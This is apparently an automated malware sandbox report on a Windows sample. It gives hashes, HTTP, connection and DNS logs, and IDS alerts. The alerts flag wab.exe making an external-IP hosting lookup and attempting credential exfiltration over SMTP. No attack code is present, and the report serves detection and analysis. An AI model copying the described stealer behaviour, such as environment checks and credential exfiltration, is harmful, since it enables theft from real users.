MD5: 7DEB79FF3630D24CE41F203E45AA2AD0
SHA256: 2CE9FA73B409FF53460EAC970254004FDFED21883D4B0E512B123D12A7FC40BA
1068 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_muibtvx4.lvd.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
HTTP(S) requests: 9
TCP/UDP connections: 38
DNS requests: 21
Threats: 4

HTTP requests

Columns: PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation (an empty Type cell means the report recorded none).

6592 | SIHClient.exe | GET | 200 | 2.17.245.133:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | binary | 409 b | unknown
1528 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAzlnDD9eoNTLi0BRrMy%2BWU%3D | unknown |  | 313 b | unknown
3996 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | binary | 471 b | unknown
4480 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA177el9ggmWelJjG4vdGL0%3D | unknown | binary | 471 b | unknown
5672 | wab.exe | GET | 200 | 142.250.185.227:80 | http://ocsp.pki.goog/gtsr1/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBQwkcLWD4LqGJ7bE7B1XZsEbmfwUAQU5K8rJnEaK0gnhS9SZizv8IkTcT4CDQIDvFNZazTHGPUBUGY%3D | unknown | binary | 724 b | unknown
5672 | wab.exe | GET | 200 | 142.250.185.227:80 | http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D | unknown | binary | 1.41 Kb | unknown
5672 | wab.exe | GET | 200 | 142.250.185.227:80 | http://ocsp.pki.goog/gts1c3/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEQCRd4hKrA6aBAnnS3UYBsso | unknown | binary | 472 b | unknown
5672 | wab.exe | GET | 200 | 142.250.185.227:80 | http://ocsp.pki.goog/gts1c3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCECzpBwEAqmZNCdn%2B9lFcFjc%3D | unknown | binary | 471 b | unknown
5672 | wab.exe | GET | 200 | 208.95.112.1:80 | http://ip-api.com/line/?fields=hosting | unknown | text | 6 b | unknown

Connections

Columns: PID | Process | IP | Domain | ASN | CN | Reputation (empty cells were not recorded in the report).

4828 | svchost.exe | 239.255.255.250:1900 |  |  |  | unknown
6140 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
3996 | svchost.exe | 20.190.159.64:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
1280 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
3996 | svchost.exe | 40.126.31.71:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
3996 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted
6544 | svchost.exe | 216.58.212.142:443 | drive.google.com | GOOGLE | US | whitelisted
6544 | svchost.exe | 142.250.186.129:443 | drive.usercontent.google.com | GOOGLE | US | whitelisted
3996 | svchost.exe | 40.126.31.67:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
1528 | backgroundTaskHost.exe | 88.221.92.190:443 | www.bing.com | Akamai International B.V. | NL | unknown

DNS requests

Each entry lists the domain, its reputation, and the resolved IPs.

login.live.com (reputation: whitelisted)
  • 40.126.31.71
  • 20.190.159.0
  • 20.190.159.64
  • 20.190.159.2
  • 20.190.159.68
  • 40.126.31.67
  • 20.190.159.71
  • 40.126.31.73
ocsp.digicert.com (reputation: whitelisted)
  • 192.229.221.95
settings-win.data.microsoft.com (reputation: whitelisted)
  • 51.124.78.146
drive.google.com (reputation: shared)
  • 216.58.212.142
drive.usercontent.google.com (reputation: unknown)
  • 142.250.186.129
www.bing.com (reputation: whitelisted)
  • 88.221.92.190
  • 88.221.92.189
  • 88.221.92.134
  • 88.221.92.193
  • 88.221.92.132
  • 88.221.92.137
  • 88.221.92.136
  • 88.221.92.191
  • 88.221.92.192
arc.msn.com (reputation: whitelisted)
  • 20.103.156.88
slscr.update.microsoft.com (reputation: whitelisted)
  • 20.12.23.50
www.microsoft.com (reputation: whitelisted)
  • 2.17.245.133
fe3cr.delivery.mp.microsoft.com (reputation: whitelisted)
  • 52.165.164.15

Threats

Columns: PID | Process | Class | Message

5672 | wab.exe | Potential Corporate Privacy Violation | AV POLICY Internal Host Retrieving External IP Address (ip-api. com)
5672 | wab.exe | Device Retrieving External IP Address Detected | ET POLICY External IP Lookup ip-api.com
5672 | wab.exe | Device Retrieving External IP Address Detected | POLICY [ANY.RUN] External Hosting Lookup by ip-api
5672 | wab.exe | Successful Credential Theft Detected | STEALER [ANY.RUN] Attempt to exfiltrate via SMTP
No debug info